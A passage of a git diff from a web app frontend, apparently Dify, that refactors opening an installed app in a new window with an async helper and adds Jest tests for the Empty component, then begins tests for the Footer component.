-          window.open(`${basePath}/explore/installed/${installed_apps[0].id}`, '_blank')
-        else
+        await openAsyncWindow(async () => {
+          const { installed_apps }: any = await fetchInstalledAppList(app.id) || {}
+          if (installed_apps?.length > 0)
+            return `${basePath}/explore/installed/${installed_apps[0].id}`
           throw new Error('No app found in Explore')
+        }, {
+          onError: (err) => {
+            Toast.notify({ type: 'error', message: `${err.message || err}` })
+          },
+        })
       }
       catch (e: any) {
         Toast.notify({ type: 'error', message: `${e.message || e}` })
diff --git a/web/app/components/apps/empty.spec.tsx b/web/app/components/apps/empty.spec.tsx
new file mode 100644
index 0000000000..8e7680958c
--- /dev/null
+++ b/web/app/components/apps/empty.spec.tsx
@@ -0,0 +1,53 @@
+import React from 'react'
+import { render, screen } from '@testing-library/react'
+import Empty from './empty'
+
+describe('Empty', () => {
+  beforeEach(() => {
+    jest.clearAllMocks()
+  })
+
+  describe('Rendering', () => {
+    it('should render without crashing', () => {
+      render(<Empty />)
+      expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument()
+    })
+
+    it('should render 36 placeholder cards', () => {
+      const { container } = render(<Empty />)
+      const placeholderCards = container.querySelectorAll('.bg-background-default-lighter')
+      expect(placeholderCards).toHaveLength(36)
+    })
+
+    it('should display the no apps found message', () => {
+      render(<Empty />)
+      // Use pattern matching for resilient text assertions
+      expect(screen.getByText(/noAppsFound/i)).toBeInTheDocument()
+    })
+  })
+
+  describe('Styling', () => {
+    it('should have correct container styling for overlay', () => {
+      const { container } = render(<Empty />)
+      const overlay = container.querySelector('.pointer-events-none')
+      expect(overlay).toBeInTheDocument()
+      expect(overlay).toHaveClass('absolute', 'inset-0', 'z-20')
+    })
+
+    it('should have correct styling for placeholder cards', () => {
+      const { container } = render(<Empty />)
+      const card = container.querySelector('.bg-background-default-lighter')
+      expect(card).toHaveClass('inline-flex', 'h-[160px]', 'rounded-xl')
+    })
+  })
+
+  describe('Edge Cases', () => {
+    it('should handle multiple renders without issues', () => {
+      const { rerender } = render(<Empty />)
+      expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument()
+
+      rerender(<Empty />)
+      expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument()
+    })
+  })
+})
diff --git a/web/app/components/apps/footer.spec.tsx b/web/app/components/apps/footer.spec.tsx
new file mode 100644
index 0000000000..291f15a5eb
--- /dev/null
+++ b/web/app/components/apps/footer.spec.tsx
@@ -0,0 +1,94 @@
+import React from 'react'
+import { render, screen } from '@testing-library/react'
+import Footer from './footer'
+
+describe('Footer', () => {
+  beforeEach(() => {
+    jest.clearAllMocks()
+  })
+
+  describe('Rendering', () => {
+    it('should render without crashing', () => {
+      render(